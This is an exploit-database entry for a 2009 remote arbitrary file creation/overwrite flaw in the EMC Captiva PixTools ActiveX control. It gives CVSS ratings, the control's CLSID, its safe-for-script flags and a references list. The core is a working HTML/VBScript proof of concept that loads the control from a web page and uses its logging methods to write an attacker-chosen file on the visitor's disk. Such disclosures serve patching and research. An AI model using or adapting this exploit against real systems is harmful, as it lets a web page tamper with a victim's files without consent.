EMC Captiva ISIS PixTools (PixTools 2.2 Distributed Imaging) Arbitrary File Creation/Overwrite

2009.10.08
Credit: shinnai
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------------------ <b>EMC Captiva ISIS PixTools (PixTools 2.2 Distributed Imaging) Arbitrary File Creation/Overwrite</b> url: http://www.emc.com/products/detail/software/pixtools.htm Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.net/ targetFile = "C:\Program Files\EMC Captiva\PDI\Client\PDIControl.dll" version = 2.2.3160.0 progid = "PDIControlLib.PDI" Marked as = RegKey Safe for Script: <font color = "green"><b>True</b></font> RegKey Safe for Init: <font color = "green"><b>True</b></font> Implements IObjectSafety: <font color = "red"><b>False</b></font> <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> Tested on: Windows XP Professional SP3 with Internet Explorer 8 Windows Server 2003 SP2 with Internet Explorer 8 ------------------------------------------------------------------------------------------------ <object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script> </span></span> </code></pre>

References:

http://xforce.iss.net/xforce/xfdb/53555
http://www.vupen.com/english/advisories/2009/2808
http://www.shinnai.net/xplits/TXT_17zVMhRhsRE6qC6DAj52.html
http://www.securityfocus.com/bid/36566
http://secunia.com/advisories/36896


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top